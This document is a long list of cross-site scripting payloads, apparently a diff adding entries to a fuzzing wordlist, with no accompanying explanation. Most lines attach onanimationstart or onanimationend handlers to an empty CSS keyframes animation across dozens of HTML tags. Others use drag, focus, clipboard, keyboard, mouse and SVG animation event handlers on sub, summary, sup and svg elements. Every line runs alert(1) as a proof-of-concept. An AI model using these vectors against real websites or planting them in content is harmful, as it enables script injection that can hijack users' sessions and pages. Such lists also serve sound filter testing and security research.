+<style>@keyframes x{}</style><base style="animation-name:x" onanimationend="alert(1)"></base> +<style>@keyframes x{}</style><base style="animation-name:x" onanimationstart="alert(1)"></base> +<style>@keyframes x{}</style><basefont style="animation-name:x" onanimationend="alert(1)"></basefont> +<style>@keyframes x{}</style><basefont style="animation-name:x" onanimationstart="alert(1)"></basefont> +<style>@keyframes x{}</style><bdi style="animation-name:x" onanimationend="alert(1)"></bdi> +<style>@keyframes x{}</style><bdi style="animation-name:x" onanimationstart="alert(1)"></bdi> +<style>@keyframes x{}</style><bdo style="animation-name:x" onanimationend="alert(1)"></bdo> +<style>@keyframes x{}</style><bdo style="animation-name:x" onanimationstart="alert(1)"></bdo> +<style>@keyframes x{}</style><bgsound style="animation-name:x" onanimationend="alert(1)"></bgsound> +<style>@keyframes x{}</style><bgsound style="animation-name:x" onanimationstart="alert(1)"></bgsound> +<style>@keyframes x{}</style><big style="animation-name:x" onanimationend="alert(1)"></big> +<style>@keyframes x{}</style><big style="animation-name:x" onanimationstart="alert(1)"></big> +<style>@keyframes x{}</style><blink style="animation-name:x" onanimationend="alert(1)"></blink> +<style>@keyframes x{}</style><blink style="animation-name:x" onanimationstart="alert(1)"></blink> +<style>@keyframes x{}</style><blockquote style="animation-name:x" onanimationend="alert(1)"></blockquote> +<style>@keyframes x{}</style><blockquote style="animation-name:x" onanimationstart="alert(1)"></blockquote> +<style>@keyframes x{}</style><body style="animation-name:x" onanimationend="alert(1)"></body> +<style>@keyframes x{}</style><body style="animation-name:x" onanimationstart="alert(1)"></body> +<style>@keyframes x{}</style><br style="animation-name:x" onanimationend="alert(1)"></br> +<style>@keyframes x{}</style><br style="animation-name:x" onanimationstart="alert(1)"></br> +<style>@keyframes x{}</style><button 
style="animation-name:x" onanimationend="alert(1)"></button> +<style>@keyframes x{}</style><button style="animation-name:x" onanimationstart="alert(1)"></button> +<style>@keyframes x{}</style><canvas style="animation-name:x" onanimationend="alert(1)"></canvas> +<style>@keyframes x{}</style><canvas style="animation-name:x" onanimationstart="alert(1)"></canvas> +<style>@keyframes x{}</style><caption style="animation-name:x" onanimationend="alert(1)"></caption> +<style>@keyframes x{}</style><caption style="animation-name:x" onanimationstart="alert(1)"></caption> +<style>@keyframes x{}</style><center style="animation-name:x" onanimationend="alert(1)"></center> +<style>@keyframes x{}</style><center style="animation-name:x" onanimationstart="alert(1)"></center> +<style>@keyframes x{}</style><cite style="animation-name:x" onanimationend="alert(1)"></cite> +<style>@keyframes x{}</style><cite style="animation-name:x" onanimationstart="alert(1)"></cite> +<style>@keyframes x{}</style><code style="animation-name:x" onanimationend="alert(1)"></code> +<style>@keyframes x{}</style><code style="animation-name:x" onanimationstart="alert(1)"></code> +<style>@keyframes x{}</style><col style="animation-name:x" onanimationend="alert(1)"></col> +<style>@keyframes x{}</style><col style="animation-name:x" onanimationstart="alert(1)"></col> +<style>@keyframes x{}</style><colgroup style="animation-name:x" onanimationend="alert(1)"></colgroup> +<style>@keyframes x{}</style><colgroup style="animation-name:x" onanimationstart="alert(1)"></colgroup> +<style>@keyframes x{}</style><command style="animation-name:x" onanimationend="alert(1)"></command> +<style>@keyframes x{}</style><command style="animation-name:x" onanimationstart="alert(1)"></command> +<style>@keyframes x{}</style><content style="animation-name:x" onanimationend="alert(1)"></content> +<style>@keyframes x{}</style><content style="animation-name:x" onanimationstart="alert(1)"></content> +<style>@keyframes x{}</style><data 
style="animation-name:x" onanimationend="alert(1)"></data> +<style>@keyframes x{}</style><data style="animation-name:x" onanimationstart="alert(1)"></data> +<style>@keyframes x{}</style><datalist style="animation-name:x" onanimationend="alert(1)"></datalist> +<style>@keyframes x{}</style><datalist style="animation-name:x" onanimationstart="alert(1)"></datalist> +<style>@keyframes x{}</style><dd style="animation-name:x" onanimationend="alert(1)"></dd> +<style>@keyframes x{}</style><dd style="animation-name:x" onanimationstart="alert(1)"></dd> +<style>@keyframes x{}</style><del style="animation-name:x" onanimationend="alert(1)"></del> +<style>@keyframes x{}</style><del style="animation-name:x" onanimationstart="alert(1)"></del> +<style>@keyframes x{}</style><details style="animation-name:x" onanimationend="alert(1)"></details> +<style>@keyframes x{}</style><details style="animation-name:x" onanimationstart="alert(1)"></details> +<style>@keyframes x{}</style><dfn style="animation-name:x" onanimationend="alert(1)"></dfn> +<style>@keyframes x{}</style><dfn style="animation-name:x" onanimationstart="alert(1)"></dfn> +<style>@keyframes x{}</style><dialog style="animation-name:x" onanimationend="alert(1)"></dialog> +<style>@keyframes x{}</style><dialog style="animation-name:x" onanimationstart="alert(1)"></dialog> +<style>@keyframes x{}</style><dir style="animation-name:x" onanimationend="alert(1)"></dir> +<style>@keyframes x{}</style><dir style="animation-name:x" onanimationstart="alert(1)"></dir> +<style>@keyframes x{}</style><div style="animation-name:x" onanimationend="alert(1)"></div> +<style>@keyframes x{}</style><div style="animation-name:x" onanimationstart="alert(1)"></div> +<style>@keyframes x{}</style><dl style="animation-name:x" onanimationend="alert(1)"></dl> +<style>@keyframes x{}</style><dl style="animation-name:x" onanimationstart="alert(1)"></dl> +<style>@keyframes x{}</style><dt style="animation-name:x" onanimationend="alert(1)"></dt> +<style>@keyframes 
x{}</style><dt style="animation-name:x" onanimationstart="alert(1)"></dt> +<style>@keyframes x{}</style><element style="animation-name:x" onanimationend="alert(1)"></element> +<style>@keyframes x{}</style><element style="animation-name:x" onanimationstart="alert(1)"></element> +<style>@keyframes x{}</style><em style="animation-name:x" onanimationend="alert(1)"></em> +<style>@keyframes x{}</style><em style="animation-name:x" onanimationstart="alert(1)"></em> +<style>@keyframes x{}</style><embed style="animation-name:x" onanimationend="alert(1)"></embed> +<style>@keyframes x{}</style><embed style="animation-name:x" onanimationstart="alert(1)"></embed> +<style>@keyframes x{}</style><fieldset style="animation-name:x" onanimationend="alert(1)"></fieldset> +<style>@keyframes x{}</style><fieldset style="animation-name:x" onanimationstart="alert(1)"></fieldset> +<style>@keyframes x{}</style><figcaption style="animation-name:x" onanimationend="alert(1)"></figcaption> +<style>@keyframes x{}</style><figcaption style="animation-name:x" onanimationstart="alert(1)"></figcaption> +<style>@keyframes x{}</style><figure style="animation-name:x" onanimationend="alert(1)"></figure> +<style>@keyframes x{}</style><figure style="animation-name:x" onanimationstart="alert(1)"></figure> +<style>@keyframes x{}</style><font style="animation-name:x" onanimationend="alert(1)"></font> +<style>@keyframes x{}</style><font style="animation-name:x" onanimationstart="alert(1)"></font> +<style>@keyframes x{}</style><footer style="animation-name:x" onanimationend="alert(1)"></footer> +<style>@keyframes x{}</style><footer style="animation-name:x" onanimationstart="alert(1)"></footer> +<style>@keyframes x{}</style><form style="animation-name:x" onanimationend="alert(1)"></form> +<style>@keyframes x{}</style><form style="animation-name:x" onanimationstart="alert(1)"></form> +<style>@keyframes x{}</style><frame style="animation-name:x" onanimationend="alert(1)"></frame> +<style>@keyframes x{}</style><frame 
style="animation-name:x" onanimationstart="alert(1)"></frame> +<style>@keyframes x{}</style><frameset style="animation-name:x" onanimationend="alert(1)"></frameset> +<style>@keyframes x{}</style><frameset style="animation-name:x" onanimationstart="alert(1)"></frameset> +<style>@keyframes x{}</style><h1 style="animation-name:x" onanimationend="alert(1)"></h1> +<style>@keyframes x{}</style><h1 style="animation-name:x" onanimationstart="alert(1)"></h1> +<style>@keyframes x{}</style><head style="animation-name:x" onanimationend="alert(1)"></head> +<style>@keyframes x{}</style><head style="animation-name:x" onanimationstart="alert(1)"></head> +<style>@keyframes x{}</style><header style="animation-name:x" onanimationend="alert(1)"></header> +<style>@keyframes x{}</style><header style="animation-name:x" onanimationstart="alert(1)"></header> +<style>@keyframes x{}</style><hgroup style="animation-name:x" onanimationend="alert(1)"></hgroup> +<style>@keyframes x{}</style><hgroup style="animation-name:x" onanimationstart="alert(1)"></hgroup> +<style>@keyframes x{}</style><hr style="animation-name:x" onanimationend="alert(1)"></hr> +<style>@keyframes x{}</style><hr style="animation-name:x" onanimationstart="alert(1)"></hr> +<style>@keyframes x{}</style><html style="animation-name:x" onanimationend="alert(1)"></html> +<style>@keyframes x{}</style><html style="animation-name:x" onanimationstart="alert(1)"></html> +<style>@keyframes x{}</style><i style="animation-name:x" onanimationend="alert(1)"></i> +<style>@keyframes x{}</style><i style="animation-name:x" onanimationstart="alert(1)"></i> +<style>@keyframes x{}</style><iframe style="animation-name:x" onanimationend="alert(1)"></iframe> +<style>@keyframes x{}</style><iframe style="animation-name:x" onanimationstart="alert(1)"></iframe> +<style>@keyframes x{}</style><image style="animation-name:x" onanimationend="alert(1)"></image> +<style>@keyframes x{}</style><image style="animation-name:x" onanimationstart="alert(1)"></image> 
+<style>@keyframes x{}</style><img style="animation-name:x" onanimationend="alert(1)"></img> +<style>@keyframes x{}</style><img style="animation-name:x" onanimationstart="alert(1)"></img> +<style>@keyframes x{}</style><input style="animation-name:x" onanimationend="alert(1)"></input> +<style>@keyframes x{}</style><input style="animation-name:x" onanimationstart="alert(1)"></input> +<style>@keyframes x{}</style><ins style="animation-name:x" onanimationend="alert(1)"></ins> +<style>@keyframes x{}</style><ins style="animation-name:x" onanimationstart="alert(1)"></ins> +<style>@keyframes x{}</style><isindex style="animation-name:x" onanimationend="alert(1)"></isindex> +<style>@keyframes x{}</style><isindex style="animation-name:x" onanimationstart="alert(1)"></isindex> +<style>@keyframes x{}</style><kbd style="animation-name:x" onanimationend="alert(1)"></kbd> +<style>@keyframes x{}</style><kbd style="animation-name:x" onanimationstart="alert(1)"></kbd> +<style>@keyframes x{}</style><keygen style="animation-name:x" onanimationend="alert(1)"></keygen> +<style>@keyframes x{}</style><keygen style="animation-name:x" onanimationstart="alert(1)"></keygen> +<style>@keyframes x{}</style><label style="animation-name:x" onanimationend="alert(1)"></label> +<style>@keyframes x{}</style><label style="animation-name:x" onanimationstart="alert(1)"></label> +<style>@keyframes x{}</style><legend style="animation-name:x" onanimationend="alert(1)"></legend> +<style>@keyframes x{}</style><legend style="animation-name:x" onanimationstart="alert(1)"></legend> +<style>@keyframes x{}</style><li style="animation-name:x" onanimationend="alert(1)"></li> +<style>@keyframes x{}</style><li style="animation-name:x" onanimationstart="alert(1)"></li> +<style>@keyframes x{}</style><link style="animation-name:x" onanimationend="alert(1)"></link> +<style>@keyframes x{}</style><link style="animation-name:x" onanimationstart="alert(1)"></link> +<style>@keyframes x{}</style><listing style="animation-name:x" 
onanimationend="alert(1)"></listing> +<style>@keyframes x{}</style><listing style="animation-name:x" onanimationstart="alert(1)"></listing> +<style>@keyframes x{}</style><main style="animation-name:x" onanimationend="alert(1)"></main> +<style>@keyframes x{}</style><main style="animation-name:x" onanimationstart="alert(1)"></main> +<style>@keyframes x{}</style><map style="animation-name:x" onanimationend="alert(1)"></map> +<style>@keyframes x{}</style><map style="animation-name:x" onanimationstart="alert(1)"></map> +<style>@keyframes x{}</style><mark style="animation-name:x" onanimationend="alert(1)"></mark> +<style>@keyframes x{}</style><mark style="animation-name:x" onanimationstart="alert(1)"></mark> +<style>@keyframes x{}</style><marquee style="animation-name:x" onanimationend="alert(1)"></marquee> +<style>@keyframes x{}</style><marquee style="animation-name:x" onanimationstart="alert(1)"></marquee> +<style>@keyframes x{}</style><menu style="animation-name:x" onanimationend="alert(1)"></menu> +<style>@keyframes x{}</style><menu style="animation-name:x" onanimationstart="alert(1)"></menu> +<style>@keyframes x{}</style><menuitem style="animation-name:x" onanimationend="alert(1)"></menuitem> +<style>@keyframes x{}</style><menuitem style="animation-name:x" onanimationstart="alert(1)"></menuitem> +<style>@keyframes x{}</style><meta style="animation-name:x" onanimationend="alert(1)"></meta> +<style>@keyframes x{}</style><meta style="animation-name:x" onanimationstart="alert(1)"></meta> +<style>@keyframes x{}</style><meter style="animation-name:x" onanimationend="alert(1)"></meter> +<style>@keyframes x{}</style><meter style="animation-name:x" onanimationstart="alert(1)"></meter> +<style>@keyframes x{}</style><multicol style="animation-name:x" onanimationend="alert(1)"></multicol> +<style>@keyframes x{}</style><multicol style="animation-name:x" onanimationstart="alert(1)"></multicol> +<style>@keyframes x{}</style><nav style="animation-name:x" 
onanimationend="alert(1)"></nav> +<style>@keyframes x{}</style><nav style="animation-name:x" onanimationstart="alert(1)"></nav> +<style>@keyframes x{}</style><nextid style="animation-name:x" onanimationend="alert(1)"></nextid> +<style>@keyframes x{}</style><nextid style="animation-name:x" onanimationstart="alert(1)"></nextid> +<style>@keyframes x{}</style><nobr style="animation-name:x" onanimationend="alert(1)"></nobr> +<style>@keyframes x{}</style><nobr style="animation-name:x" onanimationstart="alert(1)"></nobr> +<style>@keyframes x{}</style><noembed style="animation-name:x" onanimationend="alert(1)"></noembed> +<style>@keyframes x{}</style><noembed style="animation-name:x" onanimationstart="alert(1)"></noembed> +<style>@keyframes x{}</style><noframes style="animation-name:x" onanimationend="alert(1)"></noframes> +<style>@keyframes x{}</style><noframes style="animation-name:x" onanimationstart="alert(1)"></noframes> +<style>@keyframes x{}</style><noscript style="animation-name:x" onanimationend="alert(1)"></noscript> +<style>@keyframes x{}</style><noscript style="animation-name:x" onanimationstart="alert(1)"></noscript> +<style>@keyframes x{}</style><object style="animation-name:x" onanimationend="alert(1)"></object> +<style>@keyframes x{}</style><object style="animation-name:x" onanimationstart="alert(1)"></object> +<style>@keyframes x{}</style><ol style="animation-name:x" onanimationend="alert(1)"></ol> +<style>@keyframes x{}</style><ol style="animation-name:x" onanimationstart="alert(1)"></ol> +<style>@keyframes x{}</style><optgroup style="animation-name:x" onanimationend="alert(1)"></optgroup> +<style>@keyframes x{}</style><optgroup style="animation-name:x" onanimationstart="alert(1)"></optgroup> +<style>@keyframes x{}</style><option style="animation-name:x" onanimationend="alert(1)"></option> +<style>@keyframes x{}</style><option style="animation-name:x" onanimationstart="alert(1)"></option> +<style>@keyframes x{}</style><output style="animation-name:x" 
onanimationend="alert(1)"></output> +<style>@keyframes x{}</style><output style="animation-name:x" onanimationstart="alert(1)"></output> +<style>@keyframes x{}</style><p style="animation-name:x" onanimationend="alert(1)"></p> +<style>@keyframes x{}</style><p style="animation-name:x" onanimationstart="alert(1)"></p> +<style>@keyframes x{}</style><param style="animation-name:x" onanimationend="alert(1)"></param> +<style>@keyframes x{}</style><param style="animation-name:x" onanimationstart="alert(1)"></param> +<style>@keyframes x{}</style><picture style="animation-name:x" onanimationend="alert(1)"></picture> +<style>@keyframes x{}</style><picture style="animation-name:x" onanimationstart="alert(1)"></picture> +<style>@keyframes x{}</style><plaintext style="animation-name:x" onanimationend="alert(1)"></plaintext> +<style>@keyframes x{}</style><plaintext style="animation-name:x" onanimationstart="alert(1)"></plaintext> +<style>@keyframes x{}</style><pre style="animation-name:x" onanimationend="alert(1)"></pre> +<style>@keyframes x{}</style><pre style="animation-name:x" onanimationstart="alert(1)"></pre> +<style>@keyframes x{}</style><progress style="animation-name:x" onanimationend="alert(1)"></progress> +<style>@keyframes x{}</style><progress style="animation-name:x" onanimationstart="alert(1)"></progress> +<style>@keyframes x{}</style><q style="animation-name:x" onanimationend="alert(1)"></q> +<style>@keyframes x{}</style><q style="animation-name:x" onanimationstart="alert(1)"></q> +<style>@keyframes x{}</style><rb style="animation-name:x" onanimationend="alert(1)"></rb> +<style>@keyframes x{}</style><rb style="animation-name:x" onanimationstart="alert(1)"></rb> +<style>@keyframes x{}</style><rp style="animation-name:x" onanimationend="alert(1)"></rp> +<style>@keyframes x{}</style><rp style="animation-name:x" onanimationstart="alert(1)"></rp> +<style>@keyframes x{}</style><rt style="animation-name:x" onanimationend="alert(1)"></rt> +<style>@keyframes x{}</style><rt 
style="animation-name:x" onanimationstart="alert(1)"></rt> +<style>@keyframes x{}</style><rtc style="animation-name:x" onanimationend="alert(1)"></rtc> +<style>@keyframes x{}</style><rtc style="animation-name:x" onanimationstart="alert(1)"></rtc> +<style>@keyframes x{}</style><ruby style="animation-name:x" onanimationend="alert(1)"></ruby> +<style>@keyframes x{}</style><ruby style="animation-name:x" onanimationstart="alert(1)"></ruby> +<style>@keyframes x{}</style><s style="animation-name:x" onanimationend="alert(1)"></s> +<style>@keyframes x{}</style><s style="animation-name:x" onanimationstart="alert(1)"></s> +<style>@keyframes x{}</style><samp style="animation-name:x" onanimationend="alert(1)"></samp> +<style>@keyframes x{}</style><samp style="animation-name:x" onanimationstart="alert(1)"></samp> +<style>@keyframes x{}</style><script style="animation-name:x" onanimationend="alert(1)"></script> +<style>@keyframes x{}</style><script style="animation-name:x" onanimationstart="alert(1)"></script> +<style>@keyframes x{}</style><section style="animation-name:x" onanimationend="alert(1)"></section> +<style>@keyframes x{}</style><section style="animation-name:x" onanimationstart="alert(1)"></section> +<style>@keyframes x{}</style><select style="animation-name:x" onanimationend="alert(1)"></select> +<style>@keyframes x{}</style><select style="animation-name:x" onanimationstart="alert(1)"></select> +<style>@keyframes x{}</style><shadow style="animation-name:x" onanimationend="alert(1)"></shadow> +<style>@keyframes x{}</style><shadow style="animation-name:x" onanimationstart="alert(1)"></shadow> +<style>@keyframes x{}</style><slot style="animation-name:x" onanimationend="alert(1)"></slot> +<style>@keyframes x{}</style><slot style="animation-name:x" onanimationstart="alert(1)"></slot> +<style>@keyframes x{}</style><small style="animation-name:x" onanimationend="alert(1)"></small> +<style>@keyframes x{}</style><small style="animation-name:x" 
onanimationstart="alert(1)"></small> +<style>@keyframes x{}</style><source style="animation-name:x" onanimationend="alert(1)"></source> +<style>@keyframes x{}</style><source style="animation-name:x" onanimationstart="alert(1)"></source> +<style>@keyframes x{}</style><spacer style="animation-name:x" onanimationend="alert(1)"></spacer> +<style>@keyframes x{}</style><spacer style="animation-name:x" onanimationstart="alert(1)"></spacer> +<style>@keyframes x{}</style><span style="animation-name:x" onanimationend="alert(1)"></span> +<style>@keyframes x{}</style><span style="animation-name:x" onanimationstart="alert(1)"></span> +<style>@keyframes x{}</style><strike style="animation-name:x" onanimationend="alert(1)"></strike> +<style>@keyframes x{}</style><strike style="animation-name:x" onanimationstart="alert(1)"></strike> +<style>@keyframes x{}</style><strong style="animation-name:x" onanimationend="alert(1)"></strong> +<style>@keyframes x{}</style><strong style="animation-name:x" onanimationstart="alert(1)"></strong> +<style>@keyframes x{}</style><style style="animation-name:x" onanimationend="alert(1)"></style> +<style>@keyframes x{}</style><style style="animation-name:x" onanimationstart="alert(1)"></style> +<style>@keyframes x{}</style><sub style="animation-name:x" onanimationend="alert(1)"></sub> +<style>@keyframes x{}</style><sub style="animation-name:x" onanimationstart="alert(1)"></sub> +<style>@keyframes x{}</style><summary style="animation-name:x" onanimationend="alert(1)"></summary> +<style>@keyframes x{}</style><summary style="animation-name:x" onanimationstart="alert(1)"></summary> +<style>@keyframes x{}</style><sup style="animation-name:x" onanimationend="alert(1)"></sup> +<style>@keyframes x{}</style><sup style="animation-name:x" onanimationstart="alert(1)"></sup> +<style>@keyframes x{}</style><svg style="animation-name:x" onanimationend="alert(1)"></svg> +<style>@keyframes x{}</style><svg style="animation-name:x" onanimationstart="alert(1)"></svg> 
+<style>@keyframes x{}</style><table style="animation-name:x" onanimationend="alert(1)"></table> +<style>@keyframes x{}</style><table style="animation-name:x" onanimationstart="alert(1)"></table> +<style>@keyframes x{}</style><tbody style="animation-name:x" onanimationend="alert(1)"></tbody> +<style>@keyframes x{}</style><tbody style="animation-name:x" onanimationstart="alert(1)"></tbody> +<style>@keyframes x{}</style><td style="animation-name:x" onanimationend="alert(1)"></td> +<style>@keyframes x{}</style><td style="animation-name:x" onanimationstart="alert(1)"></td> +<style>@keyframes x{}</style><template style="animation-name:x" onanimationend="alert(1)"></template> +<style>@keyframes x{}</style><template style="animation-name:x" onanimationstart="alert(1)"></template> +<style>@keyframes x{}</style><textarea style="animation-name:x" onanimationend="alert(1)"></textarea> +<style>@keyframes x{}</style><textarea style="animation-name:x" onanimationstart="alert(1)"></textarea> +<style>@keyframes x{}</style><tfoot style="animation-name:x" onanimationend="alert(1)"></tfoot> +<style>@keyframes x{}</style><tfoot style="animation-name:x" onanimationstart="alert(1)"></tfoot> +<style>@keyframes x{}</style><th style="animation-name:x" onanimationend="alert(1)"></th> +<style>@keyframes x{}</style><th style="animation-name:x" onanimationstart="alert(1)"></th> +<style>@keyframes x{}</style><thead style="animation-name:x" onanimationend="alert(1)"></thead> +<style>@keyframes x{}</style><thead style="animation-name:x" onanimationstart="alert(1)"></thead> +<style>@keyframes x{}</style><time style="animation-name:x" onanimationend="alert(1)"></time> +<style>@keyframes x{}</style><time style="animation-name:x" onanimationstart="alert(1)"></time> +<style>@keyframes x{}</style><title style="animation-name:x" onanimationend="alert(1)"></title> +<style>@keyframes x{}</style><title style="animation-name:x" onanimationstart="alert(1)"></title> +<style>@keyframes x{}</style><tr 
style="animation-name:x" onanimationend="alert(1)"></tr> +<style>@keyframes x{}</style><tr style="animation-name:x" onanimationstart="alert(1)"></tr> +<style>@keyframes x{}</style><track style="animation-name:x" onanimationend="alert(1)"></track> +<style>@keyframes x{}</style><track style="animation-name:x" onanimationstart="alert(1)"></track> +<style>@keyframes x{}</style><tt style="animation-name:x" onanimationend="alert(1)"></tt> +<style>@keyframes x{}</style><tt style="animation-name:x" onanimationstart="alert(1)"></tt> +<style>@keyframes x{}</style><u style="animation-name:x" onanimationend="alert(1)"></u> +<style>@keyframes x{}</style><u style="animation-name:x" onanimationstart="alert(1)"></u> +<style>@keyframes x{}</style><ul style="animation-name:x" onanimationend="alert(1)"></ul> +<style>@keyframes x{}</style><ul style="animation-name:x" onanimationstart="alert(1)"></ul> +<style>@keyframes x{}</style><var style="animation-name:x" onanimationend="alert(1)"></var> +<style>@keyframes x{}</style><var style="animation-name:x" onanimationstart="alert(1)"></var> +<style>@keyframes x{}</style><video style="animation-name:x" onanimationend="alert(1)"></video> +<style>@keyframes x{}</style><video style="animation-name:x" onanimationstart="alert(1)"></video> +<style>@keyframes x{}</style><wbr style="animation-name:x" onanimationend="alert(1)"></wbr> +<style>@keyframes x{}</style><wbr style="animation-name:x" onanimationstart="alert(1)"></wbr> +<style>@keyframes x{}</style><xmp style="animation-name:x" onanimationend="alert(1)"></xmp> +<style>@keyframes x{}</style><xmp style="animation-name:x" onanimationstart="alert(1)"></xmp> +<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss> +<style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss> +<sub draggable="true" ondrag="alert(1)">test</sub> +<sub draggable="true" ondragend="alert(1)">test</sub> +<sub draggable="true" 
ondragenter="alert(1)">test</sub> +<sub draggable="true" ondragleave="alert(1)">test</sub> +<sub draggable="true" ondragstart="alert(1)">test</sub> +<sub id=x tabindex=1 onactivate=alert(1)></sub> +<sub id=x tabindex=1 onbeforeactivate=alert(1)></sub> +<sub id=x tabindex=1 onbeforedeactivate=alert(1)></sub><input autofocus> +<sub id=x tabindex=1 ondeactivate=alert(1)></sub><input id=y autofocus> +<sub id=x tabindex=1 onfocus=alert(1)></sub> +<sub id=x tabindex=1 onfocusin=alert(1)></sub> +<sub onbeforecopy="alert(1)" contenteditable>test</sub> +<sub onbeforecut="alert(1)" contenteditable>test</sub> +<sub onbeforepaste="alert(1)" contenteditable>test</sub> +<sub onblur=alert(1) tabindex=1 id=x></sub><input autofocus> +<sub onclick="alert(1)">test</sub> +<sub oncontextmenu="alert(1)">test</sub> +<sub oncopy="alert(1)" contenteditable>test</sub> +<sub oncut="alert(1)" contenteditable>test</sub> +<sub ondblclick="alert(1)">test</sub> +<sub onfocusout=alert(1) tabindex=1 id=x></sub><input autofocus> +<sub onkeydown="alert(1)" contenteditable>test</sub> +<sub onkeypress="alert(1)" contenteditable>test</sub> +<sub onkeyup="alert(1)" contenteditable>test</sub> +<sub onmousedown="alert(1)">test</sub> +<sub onmouseenter="alert(1)">test</sub> +<sub onmouseleave="alert(1)">test</sub> +<sub onmousemove="alert(1)">test</sub> +<sub onmouseout="alert(1)">test</sub> +<sub onmouseover="alert(1)">test</sub> +<sub onmouseup="alert(1)">test</sub> +<sub onpaste="alert(1)" contenteditable>test</sub> +<summary draggable="true" ondrag="alert(1)">test</summary> +<summary draggable="true" ondragend="alert(1)">test</summary> +<summary draggable="true" ondragenter="alert(1)">test</summary> +<summary draggable="true" ondragleave="alert(1)">test</summary> +<summary draggable="true" ondragstart="alert(1)">test</summary> +<summary id=x tabindex=1 onactivate=alert(1)></summary> +<summary id=x tabindex=1 onbeforeactivate=alert(1)></summary> +<summary id=x tabindex=1 
onbeforedeactivate=alert(1)></summary><input autofocus> +<summary id=x tabindex=1 ondeactivate=alert(1)></summary><input id=y autofocus> +<summary id=x tabindex=1 onfocus=alert(1)></summary> +<summary id=x tabindex=1 onfocusin=alert(1)></summary> +<summary onbeforecopy="alert(1)" contenteditable>test</summary> +<summary onbeforecut="alert(1)" contenteditable>test</summary> +<summary onbeforepaste="alert(1)" contenteditable>test</summary> +<summary onblur=alert(1) tabindex=1 id=x></summary><input autofocus> +<summary onclick="alert(1)">test</summary> +<summary oncontextmenu="alert(1)">test</summary> +<summary oncopy="alert(1)" contenteditable>test</summary> +<summary oncut="alert(1)" contenteditable>test</summary> +<summary ondblclick="alert(1)">test</summary> +<summary onfocusout=alert(1) tabindex=1 id=x></summary><input autofocus> +<summary onkeydown="alert(1)" contenteditable>test</summary> +<summary onkeypress="alert(1)" contenteditable>test</summary> +<summary onkeyup="alert(1)" contenteditable>test</summary> +<summary onmousedown="alert(1)">test</summary> +<summary onmouseenter="alert(1)">test</summary> +<summary onmouseleave="alert(1)">test</summary> +<summary onmousemove="alert(1)">test</summary> +<summary onmouseout="alert(1)">test</summary> +<summary onmouseover="alert(1)">test</summary> +<summary onmouseup="alert(1)">test</summary> +<summary onpaste="alert(1)" contenteditable>test</summary> +<sup draggable="true" ondrag="alert(1)">test</sup> +<sup draggable="true" ondragend="alert(1)">test</sup> +<sup draggable="true" ondragenter="alert(1)">test</sup> +<sup draggable="true" ondragleave="alert(1)">test</sup> +<sup draggable="true" ondragstart="alert(1)">test</sup> +<sup id=x tabindex=1 onactivate=alert(1)></sup> +<sup id=x tabindex=1 onbeforeactivate=alert(1)></sup> +<sup id=x tabindex=1 onbeforedeactivate=alert(1)></sup><input autofocus> +<sup id=x tabindex=1 ondeactivate=alert(1)></sup><input id=y autofocus> +<sup id=x tabindex=1 onfocus=alert(1)></sup> 
+<sup id=x tabindex=1 onfocusin=alert(1)></sup> +<sup onbeforecopy="alert(1)" contenteditable>test</sup> +<sup onbeforecut="alert(1)" contenteditable>test</sup> +<sup onbeforepaste="alert(1)" contenteditable>test</sup> +<sup onblur=alert(1) tabindex=1 id=x></sup><input autofocus> +<sup onclick="alert(1)">test</sup> +<sup oncontextmenu="alert(1)">test</sup> +<sup oncopy="alert(1)" contenteditable>test</sup> +<sup oncut="alert(1)" contenteditable>test</sup> +<sup ondblclick="alert(1)">test</sup> +<sup onfocusout=alert(1) tabindex=1 id=x></sup><input autofocus> +<sup onkeydown="alert(1)" contenteditable>test</sup> +<sup onkeypress="alert(1)" contenteditable>test</sup> +<sup onkeyup="alert(1)" contenteditable>test</sup> +<sup onmousedown="alert(1)">test</sup> +<sup onmouseenter="alert(1)">test</sup> +<sup onmouseleave="alert(1)">test</sup> +<sup onmousemove="alert(1)">test</sup> +<sup onmouseout="alert(1)">test</sup> +<sup onmouseover="alert(1)">test</sup> +<sup onmouseup="alert(1)">test</sup> +<sup onpaste="alert(1)" contenteditable>test</sup> +<svg draggable="true" ondrag="alert(1)">test</svg> +<svg draggable="true" ondragend="alert(1)">test</svg> +<svg draggable="true" ondragenter="alert(1)">test</svg> +<svg draggable="true" ondragleave="alert(1)">test</svg> +<svg draggable="true" ondragstart="alert(1)">test</svg> +<svg id=x onfocus=alert(1)> +<svg id=x onfocusin=alert(1)> +<svg id=x tabindex=1 onactivate=alert(1)></svg> +<svg id=x tabindex=1 onbeforeactivate=alert(1)></svg> +<svg id=x tabindex=1 onbeforedeactivate=alert(1)></svg><input autofocus> +<svg id=x tabindex=1 ondeactivate=alert(1)></svg><input id=y autofocus> +<svg onbeforecopy="alert(1)" contenteditable>test</svg> +<svg onbeforecut="alert(1)" contenteditable>test</svg> +<svg onbeforepaste="alert(1)" contenteditable>test</svg> +<svg onblur=alert(1) tabindex=1 id=x></svg><input autofocus> +<svg onclick="alert(1)">test</svg> +<svg oncontextmenu="alert(1)">test</svg> +<svg oncopy="alert(1)" 
contenteditable>test</svg> +<svg oncut="alert(1)" contenteditable>test</svg> +<svg ondblclick="alert(1)">test</svg> +<svg onfocusout=alert(1) tabindex=1 id=x></svg><input autofocus> +<svg onkeydown="alert(1)" contenteditable>test</svg> +<svg onkeypress="alert(1)" contenteditable>test</svg> +<svg onkeyup="alert(1)" contenteditable>test</svg> +<svg onload=alert(1)> +<svg onmousedown="alert(1)">test</svg> +<svg onmouseenter="alert(1)">test</svg> +<svg onmouseleave="alert(1)">test</svg> +<svg onmousemove="alert(1)">test</svg> +<svg onmouseout="alert(1)">test</svg> +<svg onmouseover="alert(1)">test</svg> +<svg onmouseup="alert(1)">test</svg> +<svg onpaste="alert(1)" contenteditable>test</svg> +<svg onunload=window.open('javascript:alert(1)')> +<svg><a onload=alert(1)></a> +<svg><abbr onload=alert(1)></abbr> +<svg><acronym onload=alert(1)></acronym> +<svg><address onload=alert(1)></address> +<svg><animate onbegin=alert(1) attributeName=x dur=1s> +<svg><animate onend=alert(1) attributeName=x dur=1s> +<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 /> +<svg><animatetransform onbegin=alert(1) attributeName=transform> +<svg><animatetransform onend=alert(1) attributeName=transform dur=1s> +<svg><animatetransform onrepeat=alert(1) attributeName=transform repeatCount=2 dur=1s> +<svg><applet onload=alert(1)></applet> +<svg><area onload=alert(1)></area> +<svg><article onload=alert(1)></article> +<svg><aside onload=alert(1)></aside> 